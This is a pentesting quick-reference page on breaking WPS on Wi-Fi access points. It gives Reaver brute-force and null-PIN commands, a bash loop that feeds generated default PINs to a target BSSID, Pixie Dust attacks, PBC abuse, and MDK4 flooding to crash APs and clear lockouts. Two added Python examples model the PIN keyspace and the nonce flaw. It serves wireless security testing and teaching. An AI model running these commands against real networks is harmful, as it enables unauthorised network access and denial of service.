Pentesting Quick Reference OSCP and Beyond

WPS Hacking


Last updated 5 months ago

WPS was originally developed by Cisco in 2006 as a method to enable convenience and ease of use for users with little knowledge. Either by pushing a button or by entering a PIN, users are able to easily connect their devices to their wireless network. Since then, multiple different exploitation tools have been developed with the intent to abuse the PIN. WPS PINs are eight digits in length, making them significantly easier to crack compared to traditional WPA methods.

WPS Connection Methods

There are four methods to connect to a WPS-enabled access point. Each of them is detailed below:

Security Concerns

PIN Method Vulnerability: The 8-digit PIN can be cracked relatively easily through brute-force attacks due to the way the protocol verifies the PIN in two halves.

Physical Security Risks: The PBC method relies on physical security, meaning an unauthorized person within range could potentially push the button and connect to the network.

WPS PIN Anatomy

The WPS PIN is eight digits in length and consists of two primary portions. The first portion is used in the M4 and M5 EAP messages, and the second portion is used in the M6 and M7 EAP messages. Each of these portions is four digits in length. Most would assume that there would be 100,000,000 (10^8) possible digit combinations, but in the case of WPS, this is not true. There are only 11,000 possible combinations.

This is due to how the PIN functions. The first half only has 10^4 possible combinations and the second half has only 10^3 possible combinations. The last digit of the second half is used as a checksum and can be easily calculated. Therefore, there are only 10,000 (10^4) + 1,000 (10^3) possible digit combinations, which is 11,000 total combinations.

Cracking Methods

  1. Online brute-forcing

  2. Offline brute-forcing, also known as the Pixie Dust Attack

WPS Reconnaissance

In order to analyze a target network, we need to view its WPS information. We can do so with several different tools. Some of the information we hope to obtain is the MAC address of the access point and which WPS version it is using. The MAC address is useful because a simple vendor lookup may tell us whether the access point's vendor is susceptible to different kinds of WPS attacks. This can easily be done with a bit of research, and later we will explore custom PIN generation based on this information. Additionally, we want to find which version of WPS is running, along with which mode it is in, as it will help us narrow down which attack techniques to employ.

If an access point is running WPS version 2.0, it is unlikely that we will be able to use any vector beyond pixie dust attacks, possibly null PIN attacks, and brute forcing attempts with very long reattempt periods. This is due to a few factors, such as a locking feature built into most access points. After a certain number of incorrectly guessed PINs, the access point locks and requires either a reboot or a timeout before it accepts additional PIN guesses.

Putting Card in Monitor Mode and scanning WPS Networks

airmon-ng start wlan0

For Reaver to work, use the following command to add a monitor-mode interface.

iw dev wlan0 interface add mon0 type monitor

Then we can start monitoring WPS networks.

airodump-ng --wps --ignore-negative-one wlan0mon

We could also narrow down our scan further to just our network in question with the following command. We specify the channel with -c and the AP MAC with --bssid.

airodump-ng --wps --ignore-negative-one -c 1 --bssid D8:D7:3D:EB:29:D5 wlan0mon

Wash is another great tool for scanning networks with WPS. We can employ a simple command with wash to display all networks with WPS and their respective versions.

wash -i wlan0mon

We can display much more verbose output with wash using the following command.

wash -j -i wlan0mon

Finding Vendor

We can find out which vendor is associated with the access point with the following command, specifying the beginning of the MAC address.

grep -i "84-1B-5E" /var/lib/ieee-data/oui.txt

Things to be wary of when testing WPS

  1. The WPS version. wps_locked status: We want to ensure that clients can join the network.

  2. The WPS Mode: If we need to press a button to join the network, chances are we are not cracking the PIN this way.

  3. Max PIN Attempts Locking: If the access point locks after a few incorrectly guessed PINs, we likely will not be able to get through all 11,000 possible combinations.

Online PIN Brute-Forcing

Reaver

Reaver is an excellent tool for conducting online password cracking attempts. It offers various options, including Null PIN attacks, custom PIN associations, Pixie Dust Attacks, and general brute-forcing.

iw dev wlan0 interface add mon0 type monitor
reaver -i [interface] -b [BSSID] -c [channel]
reaver -i mon0 -b 22:DD:48:FA:35:E9 -c 1 

Bruteforcing Half Known Pins

If we know the first four digits of the WPS PIN, we can use Reaver to bruteforce the remaining four digits. We can provide the known half PIN using the -p option followed by the first four digits. For example, if the known first half of the PIN is 1234, we would use -p 1234.

reaver -i mon0 -b D8:D7:3D:EB:29:D5 -c 1 -p 8487

Testing for Null PIN

If neither of these succeeds, we could also attempt a Null PIN attack. Some access points are vulnerable to Null PIN attacks and will even disclose the WPA-PSK when no PIN is sent. We can do so by employing the following command, specifying the Null PIN with -p "" or -p " ".

reaver -b 7E:A3:5A:22:C5:90 -c 1 -i mon0 -p " "

Retrieving WPA-PSK using Reaver with a Known PIN

If one of our brute forcing attempts succeeds, we can use the following command to verify the captured PIN. Alternatively, if the access point has a label with the PIN physically printed on the backside of the router, we can use this information to retrieve the WPA-PSK for the WiFi network. This method leverages the default PIN provided by the manufacturer to potentially gain access to the network. For the technique of using the PIN printed on the label to retrieve the WPA-PSK, the access point (AP) must be in label mode.

reaver -i mon0 -b D8:D7:3D:EB:29:D5 -c 1 -p 84870575

Secured Access Points

Traditionally, online brute-forcing attempts have been utilized in retrieving the WPS PIN and WPA-PSK. However, in recent years, manufacturers have become wiser to these attacks. As such, locking has been utilized to prevent these traditional bruteforcing techniques. The most recent vendors only allow up to 3 incorrect attempts. After each incorrect attempt, the AP will lock for 60 seconds. After 10 incorrect attempts, the AP will lock for 365 days.
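The arithmetic behind the 11,000-guess figure from the WPS PIN Anatomy section, combined with the lockout behaviour described above, as an added example that is not part of the original page. The checksum routine follows the standard WPS PIN checksum; the 3 seconds per attempt is an assumed, illustrative figure, and the policy parameters are this example's own names.

```python
"""WPS PIN keyspace and lockout arithmetic (added example, not from the original page)."""
from math import gcd

DAY = 86_400  # seconds


def wps_checksum(first7: int) -> int:
    """Eighth PIN digit: weights 3,1,3,1,... applied from the rightmost of the 7 digits."""
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)
        first7 //= 10
        accum += first7 % 10
        first7 //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if `pin` is eight digits and its last digit matches the checksum."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def count_second_halves(first_half: str) -> int:
    """How many 4-digit second halves survive the checksum for a given first half."""
    return sum(is_valid_pin(f"{first_half}{n:04d}") for n in range(10_000))


def worst_case_guesses() -> int:
    """The halves are confirmed separately, so the worst case is a sum, not a product."""
    return 10 ** 4 + count_second_halves("0000")


def seconds_to_exhaust(failures, per_attempt, soft_every=None, soft_lock=0,
                       hard_every=None, hard_lock=0):
    """Time spent on `failures` wrong guesses under a lockout policy.

    A soft lock fires every `soft_every` failures and a hard lock every
    `hard_every`; when both fall on the same failure only the hard lock counts.
    """
    hard = failures // hard_every if hard_every else 0
    soft = failures // soft_every if soft_every else 0
    if soft_every and hard_every:
        both = soft_every * hard_every // gcd(soft_every, hard_every)
        soft -= failures // both
    return failures * per_attempt + soft * soft_lock + hard * hard_lock


if __name__ == "__main__":
    guesses = worst_case_guesses()
    per_attempt = 3  # assumed seconds per online attempt (illustrative)
    no_lock = seconds_to_exhaust(guesses, per_attempt)
    soft = seconds_to_exhaust(guesses, per_attempt, soft_every=1, soft_lock=60)
    hard = seconds_to_exhaust(guesses, per_attempt, 1, 60, 10, 365 * DAY)
    print(f"worst-case guesses: {guesses}")
    print(f"no lockout:         {no_lock / 3600:.1f} hours")
    print(f"60 s per failure:   {soft / DAY:.1f} days")
    print(f"+365 d per 10:      {hard / (365 * DAY):.0f} years")
```

With no lockout the whole keyspace fits in an afternoon; with the 60-second and 365-day locks quoted above, the same search stretches to centuries, which is why lockout (or disabling WPS PIN mode) is the effective mitigation.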

Using Multiple Pre-defined PINs

While it is possible to bruteforce the WPS PIN using Reaver, we can also use a custom wordlist of potential PINs. In this section, we will explore how to generate possible PINs for a WiFi network using wpspin and then create a custom bash script to bruteforce the access point with these PINs.

The WPSPin tool is a powerful tool that includes many different PIN generation algorithms. This tool allows us to once again provide the BSSID of our target network and receive a list of possible default PINs.

git clone https://github.com/drygdryg/wpspin.git
cd wpspin
sudo python setup.py install
wpspin -A 60:38:E0:A2:3D:2A

WPSPin outputs a variety of possible PINs for valid BSSIDs. To retrieve the WPA-PSK from a known PIN, we can use the following command.

sudo reaver --max-attempts=1 -l 100 -r 3:45 -i mon0 -b 60:38:E0:A2:3D:2A -c 1 -p 73834410

In the above command, -l sets the time to wait if the access point locks WPS PIN attempts, which is set to 100 seconds. The -r option specifies the recurring delay, meaning the command will sleep for 45 seconds every 3 attempts. The --max-attempts=1 specifies that the tool will only attempt the PIN one time. This option ensures that the PIN is tested just once, rather than multiple attempts.

We can extract only the pins from the wpspin output using a combination of grep and tr commands:

wpspin -A 60:38:E0:A2:3D:2A | grep -Eo '\b[0-9]{8}\b' | tr '\n' ' '

We can now store this output in a variable of a bash script and use it for brute-forcing WPS.

#!/bin/bash

# Define the list of generated PINs
PINS='76142673 24952910 31080279 31080279 10149713 42705239 65814352 35934868 20660413 53157652 84636386 91629487 52285349 28428015 51018658 66505471 04217176 12345670 20172527 46264848 76229909 62327145 10864111 31957199 30432031 71412252 68175542 95661469 95719115 48563710 20854836 43977680 05294176 99956042 35611530 67958146 34259283 94229882 95755212'

# Loop through each PIN in the list
for PIN in $PINS; do
    echo "Attempting PIN: $PIN"
    
    # Execute reaver command with the given PIN
    sudo reaver --max-attempts=1 -l 100 -r 3:45 -i mon0 -b 72:40:6E:74:2F:3B -v -c 1 -p "$PIN"
    
    # Check if the command executed successfully
    if [ $? -ne 0 ]; then
        echo "An error occurred while attempting PIN: $PIN"
    fi
done

echo "PIN guesses complete."

For each generated PIN, the script will try the PIN only once and then wait for 100 seconds if the access point (AP) locks. Additionally, for every three attempts made, it will pause for 45 seconds. The script iterates through all the PINs in the list.

Using PIN Generation Tools

When crafting an online brute-forcing attempt, it can be cumbersome to guess all 11,000 possible PINs, especially considering most access points are utilizing default PINs. Luckily, over the years many different libraries and tools have been developed to generate these default PINs. Some of these include the Arcadyan, Vodafone EasyBox, and ComputePIN default generation algorithms.

Pixie Dust Attack

Some vendors such as Ralink, Realtek, MediaTek, and Broadcom are susceptible to offline bruteforcing techniques through the Pixie Dust Attack. This is due to bad randomization during nonce generation. The E-S1 and E-S2 nonce values are 128 bits each. As such, if we were to try to blindly bruteforce the hash values, this would take a very long time. Because certain vendors have bad/predictable nonce value generation, we can retrieve these values, which makes bruteforcing the E-Hash1 and E-Hash2 values much quicker. This helps eliminate the need to conduct online bruteforcing through every iteration of a possible PIN.
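Why the secrecy of E-S1 and E-S2 carries the whole scheme, as an added example that is not code from the original page or from any of the tools it names. The hash construction follows the WPS specification's definitions of PSK1 and E-Hash1; the AuthKey, public keys and nonces are constructed values, and the all-zero nonce is only a stand-in for a predictable generator.

```python
"""Why E-S1/E-S2 must be unpredictable (added example; all key material is constructed)."""
import hashlib
import hmac
import os


def psk_half(authkey: bytes, half_pin: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA256(AuthKey, PIN half as ASCII digits)."""
    return hmac.new(authkey, half_pin.encode(), hashlib.sha256).digest()[:16]


def e_hash(authkey: bytes, secret_nonce: bytes, psk: bytes,
           pk_e: bytes, pk_r: bytes) -> bytes:
    """E-Hash1/E-Hash2 = HMAC-SHA256(AuthKey, E-Sx || PSKx || PK_E || PK_R)."""
    return hmac.new(authkey, secret_nonce + psk + pk_e + pk_r, hashlib.sha256).digest()


def halves_matching(target: bytes, authkey: bytes, nonce_guess: bytes,
                    pk_e: bytes, pk_r: bytes) -> list:
    """PIN halves consistent with a commitment, given a guess for the secret nonce.

    The PIN half contributes only 10^4 possibilities, so the 128-bit nonce is
    the only thing that keeps the commitment from being searched offline.
    """
    matches = []
    for n in range(10 ** 4):
        half = f"{n:04d}"
        candidate = e_hash(authkey, nonce_guess, psk_half(authkey, half), pk_e, pk_r)
        if hmac.compare_digest(candidate, target):
            matches.append(half)
    return matches


def demo():
    """Commit to the same PIN half with a predictable and with a random nonce."""
    authkey = bytes(range(32))   # constructed session key
    pk_e = b"\x11" * 192         # constructed stand-ins for the 1536-bit
    pk_r = b"\x22" * 192         # Diffie-Hellman public keys
    first_half = "8487"          # first half of a PIN used earlier on this page
    psk1 = psk_half(authkey, first_half)

    predictable = bytes(16)      # stand-in for a weak generator's output
    random_nonce = os.urandom(16)

    weak_commit = e_hash(authkey, predictable, psk1, pk_e, pk_r)
    strong_commit = e_hash(authkey, random_nonce, psk1, pk_e, pk_r)

    # An observer who can predict the nonce narrows the commitment to one half.
    weak = halves_matching(weak_commit, authkey, predictable, pk_e, pk_r)
    # With a properly random nonce the same search finds nothing.
    strong = halves_matching(strong_commit, authkey, predictable, pk_e, pk_r)
    return weak, strong


if __name__ == "__main__":
    weak, strong = demo()
    print("predictable nonce ->", weak)
    print("random nonce      ->", strong)
```

The takeaway for firmware review is that the PIN never adds more than 10^4 work; any enrollee whose E-S1/E-S2 come from a weak or fixed source should have WPS PIN mode disabled.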

Reaver

We can use Reaver to perform a Pixie Dust attack against the access point, specifying the -K (or --pixie-dust) option.

reaver -K 1 -vvv -b 7E:E7:15:97:2D:6F -c 1 -i mon0

We can subsequently use this PIN to obtain the PSK (Pre-Shared Key) for the WiFi network.

reaver -b 7E:E7:15:97:2D:6F -c 1 -p 32452370 -i mon0

Oneshot

To perform a Pixie Dust attack using OneShot, we again require our interface to be in monitor mode, which we set up with airmon-ng. However, before proceeding, we should delete the previously configured mon0 interface.

iw dev mon0 del
airmon-ng start wlan0

Similar to Reaver, OneShot also includes the -K (or --pixie-dust) argument. Let's apply this option and initiate the attack.

sudo python3 /opt/OneShot/oneshot.py -i wlan0mon -b 7E:E7:15:97:2D:6F -K

Push Button Configuration

Push Button Configuration (PBC) is a simple and user-friendly method for connecting devices to a wireless network using Wi-Fi Protected Setup (WPS). It’s particularly useful for users who want to avoid entering complex passwords. PBC is a feature of WPS that allows users to connect devices to a Wi-Fi network by simply pressing a physical button on the router/AP and the connecting device, instead of entering a password.

How Does PBC Work?

  • Physical Button Press: Most routers and access points have a WPS button that triggers PBC.

  • Automatic Pairing: After pressing the button, the router will listen for new device requests to connect for a set time (usually two minutes). During this period, any device that requests access can connect without needing a password.

  • Device Side Interaction: The connecting device (e.g., smartphone, smart TV, etc.) typically has an option to connect via WPS. After selecting this, the device searches for routers or access points in PBC mode and establishes a connection. The connection is established without the need to enter a password manually.

We can use airodump-ng to check if the Wi-Fi network is in Push Button Configuration (PBC) mode.

airodump-ng wlan0mon -c 1 --wps

Consider a scenario where we are performing a wireless penetration test and discover an access point with WPS enabled. Since we're onsite at the client's office, we have direct access to the router. In this situation, we can physically press the WPS button on the back of the router, allowing us to connect to the access point without having to manually enter a password. We can achieve this by using tools such as oneshot for automated execution, or manually by utilizing wpa_cli to establish the connection.

We can also use Oneshot to automate the exploitation of PBC. Oneshot will automatically generate the valid WPS PIN and WPA passphrase for the access point. To use Oneshot, we first need to enable monitor mode on the wlan0 interface by using airmon-ng. Once monitor mode is enabled, we can run Oneshot with the --pbc argument to connect using PBC mode.

python3 /opt/OneShot/oneshot.py -i wlan0mon --pbc

wpa_cli

First, we need to scan for available access points to obtain their BSSID. This can be done using the iwlist scan command, as demonstrated below.

iwlist wlan0 scan |  grep 'Cell\|Quality\|ESSID\|IEEE'

Alternatively, we can achieve the same result with wpa_cli.

wpa_cli scan_results

Once we have identified our target BSSID, we immediately press the WPS button on the back of the router and execute the following command.

wpa_cli wps_pbc D8:D6:3D:EB:29:D5

After a few seconds, we can check wpa_supplicant to verify that we've successfully connected to the Wi-Fi network.

systemctl status wpa_supplicant

We can use dhclient followed by the interface name, such as wlan0, to obtain a valid IP address within the access point's subnet.

sudo dhclient wlan0

Crashing a Target AP with MDK4

During our efforts of retrieving the PIN and WPA-PSK, we are likely to encounter an access point locking at some point. In this section, we will demonstrate how flooding and crashing the AP can be used as a potential bypass. There are a few different kinds of WPS locks, one of which is a delay period that occurs after too many incorrect guesses. As we demonstrated in an earlier section, we can bypass this using our advanced command, specifying the sleep period and time between attempts:

sudo reaver -l 100 -r 3:45 -i wlan0mon -b 60:38:E0:XX:XX:XX -c 11

The second kind of WPS lock is one that requires the AP to be reset, either through a power cycle or some other means, after too many incorrect PIN attempts. This can dissuade us as attackers from continuing WPS PIN retrieval techniques. However, Authentication Denial-of-Service and EAPOL Start and Logoff packet injection flooding attacks can grant us this access point reset. In some cases, this will remove the WPS lock. It is worth noting that not all access points are vulnerable to these two aggressive techniques, and these techniques are truly a last resort. In some instances, the access point will crash, while the WPS lock remains enabled.

Suppose our access point displays a locked status. This will halt all PIN attempts occurring in the first terminal. Luckily, MDK4 includes functionality in its attack modules for both Authentication Denial-of-Service and EAPOL Start and Logoff Packet Injection flooding. In our third terminal, we can employ the following command to test for Authentication Denial-of-Service flooding. We specify attack module a for Authentication Denial-of-Service, and our access point's MAC address with -a.

sudo mdk4 wlan0mon a -a 60:38:E0:XX:XX:XX

Crashing a target access point (AP) with MDK4 is a method that only works on very old routers. Recent routers are not vulnerable to this type of Denial-of-Service (DoS) attack.

Authentication Denial-Of-Service attacks will continue to spoof MAC addresses to authenticate to the network. This floods the access point's client list, and in many cases causes the access point to crash, thus resetting it. This can enable us to redeem an unlocked WPS status. Alternatively, we could attempt this same attack with the Intelligent Test on the access point. The Intelligent Test connects clients against the AP and reinjects sniffed data to keep them alive.

sudo mdk4 wlan0mon a -i 60:38:E0:XX:XX:XX

If our access point is still displaying a locked status in our second terminal, we could then attempt an EAPOL Start and Logoff Packet Injection attack. In the third terminal, we have our choice of EAPOL Start or EAPOL Logoff messages. To use EAPOL Start messages, we run the following command.

mdk4 wlan0mon e -t 60:38:E0:XX:XX:XX

To use EAPOL Logoff messages to kick clients off the network, we can employ the command seen below.

mdk4 wlan0mon e -t 60:38:E0:XX:XX:XX -l

Alternatively, we could leave our EAPOL Start message MDK4 command running in our third terminal and begin the EAPOL Logoff messages in a fourth terminal. We can also utilize a deauthentication attack to kick clients.

GitHub - linkp2p/WPS-PIN
GitHub - kcdtv/nmk: WiFi Scanner and Default WPS PIN Generator for Livebox 2.1 and Livebox Next from Orange (Spain)